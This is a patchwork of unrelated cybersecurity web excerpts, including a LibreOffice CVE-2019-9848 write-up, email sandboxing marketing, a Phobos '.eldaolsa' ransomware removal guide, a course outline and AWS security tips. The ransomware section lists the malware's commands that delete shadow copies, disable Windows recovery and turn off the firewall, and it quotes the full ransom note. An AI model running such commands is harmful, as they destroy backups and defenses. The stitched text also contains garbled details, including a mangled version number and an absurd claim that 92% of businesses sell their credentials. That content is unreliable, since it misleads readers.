monitor, and respond to cyberattacks and security incidents on: Machine learning can act as the foundation stone for your cybersecurity framework by assisting in the protection, detection, identification, response, and discovery of cybercrime. SparkCognition, the Austin-based AI company, has partnered with Google Cloud Machine Learning Engine to prevent endpoint attacks and detect security threats early. As stated by Google, the engine can detect zero-day threats with an accuracy of 99.5%. 2. Malware Detection Malware refers to one that is designed to damage or infiltrate a computer system. A traditional approach to malware detection focused on identifying features using hashes, file properties, and code fragments. Algorithmic rules are created from these to classify a file as malware or benign. One of the major challenges of malware detection is the continuous evolution of malware files and versions. Rule-based approaches will not be able to adapt to these changes. Machine learning is used to detect ransomware by analyzing files during the pre-execution phase. Another challenge faced is detecting rare attacks like high-profile targeted attacks. Nowadays, deep learning algorithms are also used to detect these types of attacks. These algorithms will continue to become an asset in malware detection in the future. 3. Phishing Detection Phishing refers to stealing personally identifiable information such as account details, passwords, intellectual property, credit card data, and financial information. Phishing uses social engineering and technology to lure users into sharing sensitive and personal data. The common types of phishing attacks are website cloning, voice and text phishing, and deceptive linking. The three main groups of anti-phishing methods are: - Preventive (patch and change management, authentication). - Detective (content filtering, anti-spam, and monitoring). - Corrective (forensics, site takedown). 4. Spam Detection Machine learning greatly improves cybersecurity through spam detection. A large portion of spam attempts is blocked from reaching inboxes thanks to the robust machine learning-powered spam filters. Machine learning methods offer more scalability and efficiency than knowledge-based methods. There are different approaches to spam detection. You can classify emails as spam based on a finite set of rules that are inflexible, not scalable, and costly or you can use the machine learning techniques. Machine learning, in short, helps businesses better analyze threats and respond to security incidents and attacks. Using machine learning in cybersecurity is a fast-growing trend as businesses across several industries worldwide are using to help smoothen their business processes. Thanks to machine learning, many companies have shifted from a signature-based system to a machine learning system.
A copy of this work was available on the public web and has been preserved in the Wayback Machine. The capture dates from 2016; you can also visit the original URL. The file type is Intrusion Detection Systems (IDSs) are one of the key components for securing computing infrastructures. Their objective is to protect against attempts to violate defense mechanisms. Indeed, IDSs themselves are part of the computing infrastructure, and thus they may be attacked by the same adversaries they are designed to detect. This is a relevant aspect, especially in safety-critical environments, such as hospitals, aircrafts, nuclear power plants, etc. To the best of our knowledge, thisdoi:10.1016/j.ins.2013.03.022 fatcat:gjmx55wlkbhq5cfmjcx5nh523e
Recientemente a bug found in the popular LibreOffice office suite was released This vulnerability was cataloged in CVE-2019-9848. This fault found se can be used to execute arbitrary code when opening pre-prepared documents by the malicious person and then basically distribute them and wait for the victim to execute these documents. Vulnerability is caused by the fact that the LibreLogo component, dAimed at teaching programming and inserting vector drawings, it translates its operations into Python code. By having the ability to execute LibreLogo instructions, an attacker can execute any Python code in the context of the current user session, using the "run" command provided in LibreLogo. From Python, using system (), in turn, you can call arbitrary system commands. As described by the person who reported this bug: Macros shipped with LibreOffice run without prompting the user, even at the highest macro security settings. So if there was a LibreOffice system macro with an error allowing code to run, the user would not even get a warning and the code would run immediately. About the ruling LibreLogo is an optional component, but in LibreOffice macros are offered by default, allowing to call LibreLogo and do not require confirmation of the operation and do not display a warning, even when the maximum protection mode for macros is enabled (selecting the "Very high" level). For an attack, you can attach such a macro to an event handler that fires, for example, when you hover the mouse over a specific area or when you activate input focus on the document (onFocus event). The big problem here is that the code is not well translated and only provides python codeas script code often results in the same code after translation. As a result, when you open a document prepared by an attacker, you can achieve hidden execution of Python code, invisible to the user. For example, in the exploit example demonstrated, when you open a document without warning, the system calculator starts. And is that not the first reported bug in which events are exploited in the office suite since in months ago another case was announced where in versions 6.1.0-184.108.40.206 it is shown that the code injection is possible on Linux and Windows versions when a user hovers the mouse over a malicious URL. Since in the same way when the vulnerability was exploited, it did not generate any type of warning dialog. As soon as the user hovers the mouse over the malicious URL, the code runs immediately. On the other hand, the use of Python within the suite has also revealed cases of exploitation of bugs where the suite executes arbitrary code without restrictions or warnings. With this, the people of LibreOffice have a great task to review this part in the suite since there are several known cases that take advantage of this. The vulnerability was fixed without giving further details about it or about information about it in the update 6.2.5 from LibreOffice, released on July 1, but it turned out that the problem was not completely resolved (only the LibreLogo call from macros was blocked) and some other vectors to carry out the attack remained uncorrected. Also, the problem is not resolved in version 6.1.6 recommended for corporate users. To completely eliminate the vulnerability is planned in the release of LibreOffice 6.3, which is expected next week. Before a full update is released, users are advised to explicitly disable the LibreLogo component, which by default is available in many packages. The vulnerability was partially fixed in Debian, Fedora, SUSE / openSUSE, and Ubuntu.
Email sandboxing improves protection against spear phishing, advanced persistent threats (APTs), and emails that contain attachments with malicious code or malware. You could lose valuable email messages if you set filters to automatically delete suspicious messages. Hence, an email sandbox instead intercepts a suspicious message and stores it in a safe location. The sandbox is inaccessible to users, and the email message cannot affect the business network while it’s stored in the sandbox. Email sandboxing improves protection against spear phishing, advanced persistent threats (APTs), and emails containing malicious code or malware attachments. The sandboxed location is safe to store suspicious email messages until an administrator can review them. Any false positive messages can then be sent to their respective recipient inboxes. Genuine positive messages can be further investigated to determine if the business is the target of an email-based threat. How Email Sandboxing Works in SpamTitan If you’re looking for an anti-spam solution to protect your business from nuisance messages and potential malware, TitanHQs SpamTitan has several benefits and advanced technology that fits every industry. Administrators can deploy SpamTitan within minutes and immediately begin protecting their infrastructure and users from unwanted email messages. How is Malware Delivered via Email? Malware can be installed in several ways, but email is one of the most common attack vectors. In a phishing attack, an email is sent to an individual that includes an attachment containing malicious code, which, if executed, will result in the installation of malware. The attack could be a one-step process or a more advanced two-stage approach where the attachment contains code to download the final payload. Another strategy incorporates embedded links in an email message to direct users to an attacker-controlled website. If the malicious link is clicked, corporate users will be directed to a malicious site where they could be tricked into downloading malware or divulging their corporate network credentials. Usually, in a two-stage attack redirecting users to an attacker-controlled site, the website looks similar to a familiar business. For example, the website could look like a Google product to trick users into trusting the download. Installation of the executable could create backdoors for additional malware attacks, leave the user’s machine open to remote control, run data eavesdropping software in the background of the machine to send to cyber-criminals, and many other compromises that could be devastating to the business. How Does an Email Sandbox Block Malware? Email security solutions employ a variety of triggers for detecting threats and blocking them from accessing user inboxes. For instance, it’s common for threat intelligence agencies to aggregate server IP addresses known for sending malicious email messages. Email security software keeps an updated record of malicious email server IP addresses and uses the blocklist to automatically sandbox any messages sent from one of these email servers. The IP address of a sender’s email server is stored in message headers, so it’s a part of a message’s data. Another strategy is to scan attachments and messages as the recipient’s email server receives them. Email security installed on email servers uses antivirus applications to monitor message content and attachments, adding another protection layer for businesses. If antivirus software detects a potential threat in an email message, the message is sent to the email security system’s sandbox. In the sandbox, the attachment cannot affect the business environment, and administrators can review the threat to understand the attacker’s goal and strategy. Antivirus scans are beneficial if the email content contains a known threat. However, threat authors continually revise their malware programs to bypass antivirus detection. Antivirus software detects threats based on a signature. When an author revises their code, the signature changes and doesn’t match the previous code’s signature. An antivirus program scanning email attachments helps stop known threats but cannot identify new malware or zero-day threats. Antivirus does not detect new unseen threats in the wild, and malware authors create variants of their software. The slight changes bypass antivirus detection and avoid detection from some monitoring systems. Businesses must then defend against dozens of variants that act similarly to previous threats, but code changes make them undetectable in older ineffective cybersecurity infrastructure. Advanced technology included in SpamTitan uses more effective strategies for identifying malicious attachments. Artificial intelligence (AI) in SpamTitan identifies zero-day threats and uses various models to detect a threat rather than rely on a database of malware signatures. Blocking known malicious email servers’ IP addresses, are also incorporated. What is Email Sandboxing? Email sandboxing is a security feature that helps to identify and block these new email-based threats. Any unseen exploits in the wild are called zero-day threats or zero-hour threats. Zero-day threats get their name from old antivirus companies for having no signatures until they’re analyzed. With AI-driven email security, zero-day threats are identified using numerous triggers and data contained within messages, including their headers. After email security identifies a threat, it must send messages to a safe location. The sandbox is a segmented storage location where malware cannot reach the internal network. Malware can be stored without affecting the internal network, and administrators can review it without affecting their devices. Security analysts use these sandboxed executables to research zero-day threats and identify their attack mode. Included with the SpamTitan sandbox is machine learning automation to perform behavioral analysis. The analysis can determine how sandboxed malware behaves so that the research can be reported to others to help stop any critical global downtime from sophisticated ransomware or other malicious activity. All machine learning and analysis are done in the sandbox so that malicious messages do not affect the business environment. Executable files aren’t the only content analyzed in a SpamTitan sandbox. Other file types can also contain malicious code, including scripts or Microsoft documents. Microsoft documents allow users to write Visual Basic code in macros. These macros can connect to the internet and download malware with additional payloads. Microsoft Word and Excel are commonly used to trick users into opening email attachments and running macros. The macros download ransomware and install the malware on the local user’s machine. A sandbox system protects users from these files and their macros, and machine learning scans help security researchers identify the payload and malicious code. The quarantined section of an email server avoids data loss after a false positive. False positives are incorrectly flagged messages. A sender might forward a message containing a link to a questionable site, and this site might be legitimate. If the email security system automatically deletes the message, it never reaches the recipient’s inbox. Unseen important messages incorrectly flagged and deleted could cause severe communication issues between businesses and customers. Quarantining messages gives security researchers more time to understand an ongoing attack and build tools to stop them. Some sophisticated attacks, including ransomware, use email as their delivery method. In a sandboxed quarantine, researchers can review delivery methods and payloads to gain insight into the malware’s goals and potentially identify the author. Usually, sophisticated attacks involve multiple cyber-criminals working in groups to target businesses and governments. Using a sandbox protects users from malware but avoids deleting data in case of false positives. It’s two of the most important benefits of email security. Also, email filters like SpamTitan can stop nuisance messages from taking up expensive storage space on the network. Storage costs money, and spam messages can quickly fill up storage space. Nuisance messages fill up a sandbox, but they can then be deleted to restore storage capacity for legitimate messages. The Benefits of Email Sandboxing Protecting employees from malicious email messages is just one apparent benefit of email filters, but adding a layer of security to your digital communications has several other unapparent benefits. Email filtering software benefits the business but can also help email administrators, security professionals, and other staff members responsible for protecting corporate data and business infrastructure. A few other benefits of an email sandbox include: - Early detection of advanced attacks, prevention of data breaches, and reducing incident response costs and investigations. - Reduction of threat-hunting activities to find the latest cyber-criminal activity and zero-day malware. - Prevention of server and endpoint operating systems from being exposed to email-based threats. - Ease of integration with your operating system environment using cloud implementations. - Automatically stop threats before they execute on the business environment, including advanced persistent threats, targeted phishing attacks, malware evasion strategies, obfuscated executables, malware variants, customized malicious code, and ransomware. - Continuous protection using artificial intelligence and machine learning against evolving advanced persistent threats. - Cost savings from removal of spam and other nuisance messages that exhaust storage capacity unnecessarily. - Cloud-based solutions make integrating an email sandbox into your email processes easy without making extensive changes to infrastructure configurations. - Defend against threats that could compromise business assets and cause critical data breaches. - Stay compliant with the latest regulations and avoid hefty fines for violations. Every midsize to enterprise business gets thousands of targeted messages towards employees. Employees are a company’s weakest link, and phishing messages are incredibly effective. Having a sandbox environment benefits your security strategies two-fold: it protects your users from being a point of weakness in cyber defenses and gives your security people a way to evaluate an attack to prepare and notify users. Not every email filtering solution has a sandbox, but SpamTitan includes a sandbox to help security researchers better understand ongoing attacks. The artificial intelligence and machine learning included with the SpamTitan products also speed up identification of attacks, especially if other researchers have yet to see a particular attack strategy or exploit in the wild. It’s important to note that a good security strategy is built in layers. Email filtering solutions are just one layer. A sandbox environment included with an email filtering solution is another layer and an added benefit. Every organization should maintain additional security infrastructure on the network environment, including antivirus and antimalware as a failsafe, monitoring software to detect any suspicious network activity, and intrusion prevention to stop malicious activity on the network automatically. The sandbox environment included with SpamTitan is a complementary feature in email filtering security. Security awareness training should also be included in your strategies. Should a malicious email bypass email security and filters, the security awareness training should allow employees to detect phishing and social engineering. Having several layers and security awareness training makes it much more difficult for cyber-criminals to compromise business systems and steal data. SpamTitan Email Sandboxing Only some email filtering solutions are built the same, and your choice for your email security should fit your business requirements. SpamTitan is more than a simple email filtering software. It’s an extensive suite of advanced email security features built by TitanHQ engineers for businesses that need better research and protection from zero-day threats. The sandbox also works on current threats; researchers can review them for any variants. With the SpamTitan suite of products, businesses get advanced email security features, including a gateway where administrators can connect existing infrastructure. The gateway is a virtual appliance that connects your current email on-premises or cloud infrastructure to the SpamTitan email filtering software. Included with SpamTitan is an antivirus scanner that analyzes all email attachments as they flow to your employee inboxes. The SpamTitan antivirus scanner detects malicious malware or macros embedded into malicious documents. The Bitdefender-powered sandbox scans and analyzes incoming email messages, and the integrated artificial intelligence can identify any zero-day threats. Since SpamTitan is cloud-based, the sandbox also sits in the cloud so that you do not have malicious code or documents on your network where it can be accidentally executed. The behavioral analysis helps security researchers or onsite staff determine the exact threat and potential motivation for targeted phishing, malware, and social engineering attacks. Sandboxing features let these security researchers and staff safely review threats without harming the business network environment. When SpamTitan detects a threat, it immediately quarantines the email message and its attachments. Quarantined messages are sent to Bitdefender Global Protective Network cloud threat intelligence services. Threat intelligence services help businesses identify new threats, and security researchers pool their discoveries together so that zero-day threats are more quickly detected and cyber-defenses built to stop them. Several large security groups and technology companies contribute to threat intelligence. The collaboration helps smaller businesses with no onsite security staff or researchers. Research collected from threat intelligence contributes to updates across all cybersecurity fields, and SpamTitan incorporates new research intelligence into its updates to stop the latest identified threats. The Bitdefender threat intelligence network consists of over 650 million endpoints worldwide, so the SpamTitan software leverages the work of numerous researchers around the globe. Using artificial intelligence and threat research, the SpamTitan system automatically blocks any messages with the same threat. Messages with known threats bypass the sandbox environment, and SpamTitan blocks the message from reaching the intended recipient’s inbox. If a malicious email is detected, it will be quarantined, and the threat information will be sent to the Bitdefender Global Protective Network cloud threat intelligence service. That means all other endpoints connected to the Bitdefender Global Protective Network will be protected. If the file or link is reencountered, it will not need to be passed through the email sandboxing feature again, as the message will be automatically blocked. The threat intelligence network consists of more than 650 million endpoints worldwide, which is why SpamTitan email sandboxing achieves the highest detection rates. Try SpamTitan Email Security with Sandboxing Free of Charge You need an email security solution with email sandboxing to improve email security. To learn how easy SpamTitan is to set up and use to protect your email environment better, we invite you to try the solution for 30 days on a no-obligation, 100% free trial. How Email Sandboxing Works in SpamTitan Using a more aggressive pre-filter than the regular AV engine, Bitdefender Antivirus determines if an email attachment should or should not be sent to the sandbox. If the engine recommends an attachment be sent to the sandbox, the following occurs: If the email would not otherwise have been blocked by any other means, SpamTitan uploads the attachment to the sandbox, where it is assigned a job identifier. SpamTitan queries the sandbox every fifteen seconds (for up to twenty minutes) to see if the job is complete. During this period, the message delivery status in History is ‘Sent to Sandbox.’ If no result is returned after twenty minutes, the file is marked as clean, and the email is passed. If the sandbox returns that the attachment contains malware, the email is blocked as a virus with the virus name assigned as ATP.Sandbox. The message will be listed under Viruses in the relevant Quarantine report. You can view emails that have been sandboxed by filtering them in History. Go to Reporting > History > Mail Filters and check ‘Sandboxed.’ If a message blocked as spam is released and originally marked as ‘Sent to Sandbox’, SpamTitan will re-scan the message against the Bitdefender Antivirus engine upon release. This may result in the message getting blocked or being sent to the sandbox. What is the email sandboxing process? The email sandboxing process is when an email arrives at an organization’s email server, an email filter for known malicious content first scans it. If the email filter finds no malicious content, the email is then sent to a sandbox for further analysis. The sandbox analyzes the email for malicious content using file scanning, behavior analysis, and machine learning techniques. If a threat is found, the email is quarantined, and an email is sent to system administrators. What are the benefits of email sandboxing? The benefits of email sandboxing include protection from malicious content, improved email filtering accuracy, a reduced number of false positives, and a reduced risk of data breaches. It is also essential to be aware that SpamTitan supports “time-of-click” analysis so that if a link in an email passes the sandboxing tests but is later weaponized, the SpamTitan web filter will prevent the user from accessing the malicious website. What are the best practices for effective email sandboxing? The best practices for effective email sandboxing include: - Deploying an email filter supplied by a reputable provider. - Configuring the sandboxing capability to meet the specific needs of the organization. - Monitoring the capability’s output for false negatives and false positives. - Educating the workforce to report email-borne threats that evade detection by the sandboxing capacity. Are there any disadvantages of email sandboxing? There are disadvantages of email sandboxing – the primary one being that the delivery of legitimate emails can be delayed due to the inspection process. While this consideration can be overcome by allowlisting emails from trusted sources (so they bypass the inspection process), this solution does not scale well because trusted sources’ email accounts can be compromised. Another disadvantage is that email sandboxing can provide a false sense of security. If users believe every email goes through the sandbox process, they may need to be more diligent about how they interact with emails. SpamTitan knows this risk and includes “time-of-click” URL analysis among its robust security features. How does sandboxing improve an organization’s email security strategy? Sandboxing improves an organization’s email security strategy by providing an additional defense against previously unknown and emerging threats that may evade traditional security measures. Email sandboxing reduces the risk of successful attacks by isolating potentially malicious content, and, by investigating the content of the email, organizations get valuable insights into the behavior and characteristics of the malicious content – aiding in threat intelligence and future prevention efforts.
Penetration tests offer a snapshot of an organization’s defenses at a specific point in time. XM Cyber tests continuously to keep you up to date as problems arise. Cybersecurity experts know the value of penetration testing and many compliance rules require these tests on a regular basis. The goal is to act like a hacker and run simulated cyberattacks to find weaknesses in current IT systems and network security. XM Cyber improves upon existing pen test techniques by automating the process, continually and safely simulating a realistic, full attack cycle against an entire enterprise network infrastructure. While typical pen test activities identify if an attacker can get into a network, XM Cyber expands upon this concept to answer the question – Does my security work? The benefits of automated attack simulation versus typical manual pen testing are easily identified – manual efforts are decreased, the process can run continuously instead of once or twice a year, and the tools used are updated constantly. If the security posture of an organization changes, XM Cyber will identify the new gaps and report. In addition, XM Cyber provides a prioritized response plan that focuses scarce security and IT resources on solving issues related to the most critical issues. Automate tedious, manual pen tests to maximize your scarce IT security resources. Rely on XM Cyber Labs and the Mitre ATT&CK framework to update attack scenarios regularly. The goal is to prevent future attacks, not just identify problems. Use our actionable remediation reports to prioritize security and IT projects to protect what’s most important.. See every step with a detailed, visual map of your entire network. Drill down to devices and successful hacker steps that might reach your critical assets. Safe in Production XM Cyber uses patented simulation techniques that do not require real exploits to be unleashed on your network. Run continuously to identify every attack vector available to an attacker to compromise your most critical assets.
What is .eldaolsa file infection? Also referred to as PHOBOS ransomware, it modifies your documents by means of encrypting them and demanding the ransom to be paid allegedly to restore access to them. id[XXXXXXXX-XXXX].[icq_konskapisa].eldaolsa indicates icq_konskapisa as a channel for contacting the ransomware authors. The PHOBOS ransomware is active again through its new cryptovirus bearing the name of .eldaolsa. This particular virus family modifies all popular file types by means of adding the .eldaolsa extension, thus making the data absolutely unavailable. The victims simply cannot open their important documents anymore. The ransomware also assigns its unique identification key, just like all previous representatives of the virus family. As soon the file is encrypted by the ransomware, it obtains a special new extension becoming the secondary one. The file virus also generates a ransom note providing the users want instructions allegedly to restore the data. Eldaolsa Threat Summary |Name||.id[XXXXXXXX-XXXX].eldaolsa file virus| |Extension||[icq_konskapisa].eldaolsa file virus| |Detection||Razy.750692, Trojan:Win32/Glupteba.KMG!MTB, Trojan:Win32/Wacatac.DE!ml| |Short Description||The ransomware modifies the documents on the attacked device through encryption and asks for the ransom to be paid by the victim supposedly to recovery them.| |Symptoms||The file virus encrypts the data by adding the .eldaolsa extension, also generating the one-of-a-kind identifier. Note that the [icq_konskapisa].eldaolsa extension becomes the secondary one.| |Distribution Method||Spam, Email attachments, Compromised legitimate downloads, Attacks exploiting weak or stolen RDP credentials1.| |Fix Tool||See If Your System Has Been Affected by .eldaolsa file virus| Eldaolsa deletes shadow copies of files, disables the recovery and repair functions of Windows, at the boot stage, disables the firewall with commands, launches the mshta.exe application to display ransomware requirements: vssadmin.exe vssadmin delete shadows /all /quiet WMIC.exe wmic shadowcopy delete bcdedit.exe bcdedit /set default recoveryenabled no bcdedit.exe bcdedit /set default bootstatuspolicy ignoreallfailures netsh.exe netsh advfirewall set currentprofile state off netsh.exe netsh firewall set opmode mode=disable .eldaolsa File Virus – Phobos Ransomware What Is It and How Did I Get It? The .eldaolsa ransomware is most commonly spread by means of a payload dropper. It runs the malicious script that eventually installs the file virus. The threat circulates actively on the web, considering the facts about the ransomware mentioned in the VirusTotal database. The .eldaolsa ransomware may also promote its payload files through popular social networks and via file-sharing platforms. Alternatively, some free applications hosted on many popular resources may also be disguised as helpful tools, whereas they instead may lead to the malicious scripts that injected the ransomware. Your personal caution to prevent the .eldaolsa virus attack matters a lot! .eldaolsa ransomware is a infection that encrypts your data and presents a frustrating ransomware notice. Below is the screenshot depicting the ransomware note: Quotation of the scary message All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail icq_konskapisa Write this ID in the title of your message ********-**** If there is no response from our mail, you can install the Jabber client and write to us in support of You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Jabber client installation instructions: Download the jabber (Pidgin) client from https://pidgin.im/download/windows/ After installation, the Pidgin client will prompt you to create a new account. Click "Add" In the "Protocol" field, select XMPP In "Username" - come up with any name In the field "domain" - enter any jabber-server, there are a lot of them, for example - exploit.im Create a password At the bottom, put a tick "Create account" Click add If you selected "domain" - exploit.im, then a new window should appear in which you will need to re-enter your data: User password You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. Remove [icq_konskapisa].eldaolsa File Virus (Phobos) Reasons why I would recommend GridinSoft2 The is an excellent way to deal with recognizing and removing threats – using Gridinsoft Anti-Malware. This program will scan your PC, find and neutralize all suspicious processes3. Download GridinSoft Anti-Malware. You can download GridinSoft Anti-Malware by clicking the button below: Run the setup file. When setup file has finished downloading, double-click on the setup-antimalware-fix.exe file to install GridinSoft Anti-Malware on your system. An User Account Control asking you about to allow GridinSoft Anti-Malware to make changes to your device. So, you should click “Yes” to continue with the installation. Press “Install” button. Once installed, Anti-Malware will automatically run. Wait for the Anti-Malware scan to complete. GridinSoft Anti-Malware will automatically start scanning your computer for Eldaolsa infections and other malicious programs. This process can take a 20-30 minutes, so I suggest you periodically check on the status of the scan process. Click on “Clean Now”. When the scan has finished, you will see the list of infections that GridinSoft Anti-Malware has detected. To remove them click on the “Clean Now” button in right corner. How to decrypt .eldaolsa files? You can download and use this decrypter that Kaspersky released if you were hit by .[icq_konskapisa].eldaolsa extension. What the next? If the guide doesn’t help you to remove Eldaolsa infection, please download the GridinSoft Anti-Malware that I recommended. Also, you can always ask me in the comments for getting help. Good luck! User Review( votes) - How To Change Remote Desktop (RDP) Port: https://howtofix.guide/change-remote-desktop-port-on-windows-10/ - GridinSoft Anti-Malware Review from HowToFix site: https://howtofix.guide/gridinsoft-anti-malware/ - More information about GridinSoft products: https://gridinsoft.com/products/
a local user to the database, configure the settings described in the following table. Local User Settings Enter a name to identify the user (up to 31 characters). The name is case-sensitive and must be unique. Use only letters, numbers, spaces, hyphens, and underscores. Select the scope in which the user account is available. In the context of a firewall that has more than one virtual system (vsys), select a vsys or select virtual systems). In any other context, you can’t select the its value is predefined as Shared ( ) or as Panorama. After you save the user account, you can’t change its Use this field to specify the authentication confirm a password for the user. —Enter a hashed password string. This can be useful if, for example, you want to reuse the credentials for an existing Unix account but don’t know the plaintext password, only the hashed password. The firewall accepts any string of up to 63 characters regardless of the algorithm used to generate the hash value. The operational CLI command request password-hash password the MD5 algorithm when the firewall is in normal mode and the SHA256 algorithm when the firewall is in CC/FIPS mode.
Instruktážní video ukazující nastavení adaptéru Grandstream HT286 pro volání přes internet běžnými telefony. Grandstream HT286 Reboot. Grandstream HT286 Firmware Upgrade Problem. VoIP System for Enterprise Network Moo Wan Kim and Fumikazu Iseki Tokyo University of Information Sciences Japan 1. Introduction This chapter describe VoIP system for the enterprise network (e.g. company, university) based on Asterisk(http://www.asterisk.org). Asterisk is a kind of open source software to implement IP-PBX system and supports various necessary protocols to realize the VoIP system such as SIP, H.323, MGCP, SCCP. First the main ideas and development process are described based on the VoIP system that we have developed by using Asterisk in the Intranet environment. Then the new scheme to realize high security by using Open VPN is described when developing the large scale enterprise network. 2. Basic idea The following are the main requirements to develop the VoIP system for the enterprise network (Yamamoto et al., 2008) a. Scalability In the environment of the enterprize network, it is not easy to anticipate the traffic because there are lots of uncontrollable factors. So developing various ...
Security: a Many Pronged Word Security. This word has many meanings, depending on how you look at things. For some people security means that others should not be able to see the data you are sending or storing. For others this means making sure you know who is using your system and determining what actions they can perform with it. Sometimes it means ensuring the data cannot be changed in transit. Here we will look at all the different meanings of security and discuss 10 rules you should always adhere to. - Security Testing is Different - Applying STRIDE - The Ten Immutable Laws of Security How do you keep prying eyes away from your data? Encrypting data ensures that only the intended receiver of the data can understand it. So how does this work? We will look at symetric keys versus asymtric ones. We will also look at the most used encryption algorighms, what role certificates play and describe how TLS and HTTPS work. - What is Encryption? - Understanding Symmetric Keys - And what about Asymmetric Keys - Hybrid Encryption - Properly store Passwords with Hashing and Salts - What are Digital Signatures? - Certificates, SSL, TLS and HTTPS - LAB: Encryption OWASP Web Security Headers OWASP defined a couple of special security headers which allow you some control over what the browser will do with your content. In this chapter we will discuss two of these headers. - Understanding HTTP headers and their role in security - Setting headers in IIS and ASP.NET Core - HTTP Strict Transport Security header - HSTS options - HTTP Public Key Pinning - Understanding TOFU and how to mitigate Understanding Claims-Based Security What is a given user allowed to do in your application? This most-likely depends on the role that user has in your organisation. This role is now represented with claims. In this chapter you will get a better understanding why claims are better than roles, and how claims are transmitted in a secure way as tokens. - Representing the User - Introducing Claims Based Security - Understanding Tokens - Using Claims in .NET - LAB: Authenticating a Website with Claims Modern Web Authentication and Authorization In the modern web we all want to share stuff. But how do you safely allow one web site to access resources from another web site? With OpenID Connect you can delegate authentication to an identity provider (such as Facebook, Azure AD, Identity Server and others). - The Internet and a Way of Sharing - Introducing OAuth and OpenID Connect - OAuth Fundamentals: Authorization Code Grant, PKCE and Client Credential Grant - Implementing OpenID Connect Web Sign-in with AzureAD and Identity Server Protecting a Web-API with OpenID Connect and AzureAD Modern web sites and mobile apps often consume REST services. You can use OpenID Connect to authenticate users, after which you can use claims to authorize access to resources stored in a web API. - Protecting a Web API's resources - Adding permissions to the server side - Requesting permissions at the client side - Using the Microsoft Authentication Library (MSAL) - User consent - LAB: Getting an access token and passing it to the server Web Security Threats and Defences To better protect yourself against attacks, you should first learn what kind of attacks are common. Once you understand these attacks we can look at defending against them. - OWASP - Top 10 security issues - Broken Access Control - Cryptographic Failures - Insecure Design - Security Misconfiguration - Vulnerable and Outdated Components - Indentification and Authentication Failures - Software and Data Integrity Failures - Security Logging and Monitoring Failures - Server-Side Request Forgery - Extra: Denial of Service The best defence is a good offence. In this hands-on module, you are going to put on your black hat and try to exploit as many vulnerabilities as you can in a web application made just for that. - Introducing the OWASP Juice Shop - LAB: Finding vulnerabilities in a webshop Cyber security is becoming an increasingly important topic for organizations. The quantity and importance of data entrusted to web applications is growing, and defenders need to learn how to secure them. Imagine your organization making the news, not because of some new world-changing product, but because of a data leak containing all your customers' data, including personal information and credit card details! As a modern web developer mastering these skills is important because you cannot afford not to! This course takes you through the different security threats and defenses and teaches you hands-on how to apply them to ASP.NET Core. Among others, you will learn how to authenticate with OpenID Connect and Azure AD, protect your API with OAuth2 and secure your company data with proper encryption techniques. This course provides in-depth, hands-on experience securing your web-based applications. This course is meant for developers that have experience with ASP.NET MVC or ASP.NET Core and want to make the world a safer place through applied security best practices.
Internet of Things (IoT) devices are increasingly deployed for different purposes such as data sensing, collecting and controlling. IoT improves user experiences by allowing a large number of smart devices to connect and share information. Many existing malware attacks, targeted at traditional computers connected to the Internet, may also be directed at IoT devices. Therefore, efficient protection at IoT devices could save millions of internet users from malicious activities. However, existing malware detection approaches suffer from high computational complexity. In this study, the authors propose a more accurate and fast model for detecting malware in the IoT environment. They introduce a Malware Threat Hunting System (MTHS) in the proposed model. MTHS first converts malware binary into a color image and then conducts the machine or deep learning analysis for efficient malware detection. They finally prepare a baseline to compare the performance of MTHS with traditional state-of-the-art malware detection approaches. They conduct experiments on two public datasets of Windows and Android software. The experimental results indicate that the response time and the detection accuracy of MTHS are better than those of previous machine learning and deep learning approaches. The article is available here.
Transactions on Cardano are normally validated in phase 1, which means before they even get onto the network they are completely verified. If something is off, such as inadequate fees or an insufficient balance, the transaction is directly rejected without incurring costs. Smart contracts (Plutus validators), on the other hand, are validated in phase 2. Only the node that produces the block verifies the contract fully. In the event of a contract failure, a collateral is taken to cover the resources (cpu and memory) used by the node to verify the contract. When a script runs successfully, the collateral is not taken. The chances of losing the collateral are very low; however, Nami seeks to minimize the risk by only allowing a determined amount (5₳) of collateral to be used. In a worst case scenario, malicious, or poorly built dApps, would only be able to take this amount. Finally, collateral aims to prevent bad actor from spamming the network with failing contracts.
Uncovering the Hidden Dangers Of AWS Vulnerability By Tom Seest At BestCybersecurityNews, we help entrepreneurs, solopreneurs, young learners, and seniors learn more about cybersecurity. To protect your web applications, you need to know about the risks and vulnerabilities. AWS has several services that can be prone to attack or vulnerability. These services are Elastic Container Service, Cloud storage, Network activity, and XML evaluation and rendering issues. Learn more about these services and how you can secure them. Table Of Contents - How Does Cloud Storage Increase Your Vulnerability to AWS Attacks? - What Network Activity Triggers an AWS Vulnerability? - Exploring AWS Security with Elastic Container Service - XML Vulnerabilities: Uncovering the Risks - Exploiting SSRF: How Does it Work? - What Are the Most Common Misconfigurations in AWS Services? - What Insightidr Can Do to Protect Your AWS Environment - Uncovering Vulnerabilities with Rapid7 Insightops An AWS vulnerability or attack on cloud storage can be disastrous for a company’s reputation. According to McAfee, 92% of business organizations sell their credentials on the dark web. These attackers may use these credentials to download sensitive data or disrupt operations. To avoid this, you should configure your cloud backups to use encryption and restrict access. First, you should check your cloud storage for any anomalies in the content and read/write patterns. You can also look at network activity to determine if instances have been intentionally opened to the internet. Similarly, you should look at the identities stored on instances as they can be used to a lateral move. To protect your data, you should use multi-factor authentication on privileged accounts. Many organizations don’t enable this security feature, making them more vulnerable to social engineering and credential theft attacks. Alternatively, you can implement a single sign-on solution by using an identity solution provider. The benefit of this solution is that you can centralize authentication and eliminate the need to manually create IAM users. Furthermore, you can create short-term keys that expire after a predetermined period. One of the easiest ways to secure your cloud environment is to limit network activity. This can help protect your accounts from a variety of AWS vulnerabilities. For example, AWS 